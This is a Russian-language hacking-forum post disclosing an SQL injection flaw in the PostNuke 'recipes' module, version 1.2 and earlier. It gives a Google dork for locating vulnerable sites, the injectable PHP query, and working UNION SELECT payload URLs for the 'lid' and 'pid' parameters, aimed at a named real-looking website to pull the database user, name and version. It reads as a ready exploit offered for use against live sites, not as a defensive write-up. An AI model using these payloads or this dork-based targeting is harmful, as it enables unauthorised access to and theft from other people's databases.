|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: recipes SQL
Уязвимый продукт: Модуль: recipes
Версия: <=1.2
Дорк: "inurl:module=recipes"
Условие: "нет"
1 Код
PHP код:
$sql = "SELECT $recipescolumn[cid],
$recipescolumn[title],
$recipescolumn[ingredientsfor],
$recipescolumn[ingredients],
$recipescolumn[description],
$recipescolumn[note],
$recipescolumn[origin],
$recipescolumn[wine],
$recipescolumn[image],
$recipescolumn[date],
$recipescolumn[author],
$recipescolumn[email],
$recipescolumn[chkvegetarian],
$recipescolumn[chkmilkandderivatives],
$recipescolumn[chkwheatflour],
$recipescolumn[chkeggs],
$recipescolumn[pagecounter],
$recipescolumn[submitter]
FROM $recipestable
WHERE $recipescolumn[lid] = " . pnVarPrepForStore($lid);
Уязвимый параметр lid
Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=display&lid=-48+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8/*
Вобщем-то фильтрация отсутствует напрочь, так что скули везде, можно выкладывать весь модуль
Уязвимый параметр pid
Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=catview&pid=-9+union+select+1,concat_ws(0x3a,User(),Database(), Version())/*
И т.д.
|